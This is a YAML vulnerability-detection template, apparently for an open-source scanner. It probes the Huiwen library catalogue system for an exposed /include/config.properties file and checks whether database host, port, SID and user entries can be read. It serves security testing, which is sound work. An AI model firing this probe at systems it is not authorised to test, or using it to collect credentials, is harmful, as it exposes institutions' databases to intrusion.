id: huiwen-book-config-properties-info-leak

info:
  name: 汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞
  author: zan8in
  severity: high
  description: |
    汇文 图书馆书目检索系统 /include/config.properties 文件中包含敏感信息，攻击者可以直接访问获取信息
    app="汇文软件-书目检索系统"
  reference:
    - http://wiki.peiqi.tech/wiki/webapp/%E6%B1%87%E6%96%87/%E6%B1%87%E6%96%87%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E4%B9%A6%E7%9B%AE%E6%A3%80%E7%B4%A2%E7%B3%BB%E7%BB%9F%20config.properties%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /include/config.properties
    expression: response.status == 200 && response.body.bcontains(b'host') && response.body.bcontains(b'port=') && response.body.bcontains(b'sid=') && response.body.bcontains(b'user=')
expression: r0()
      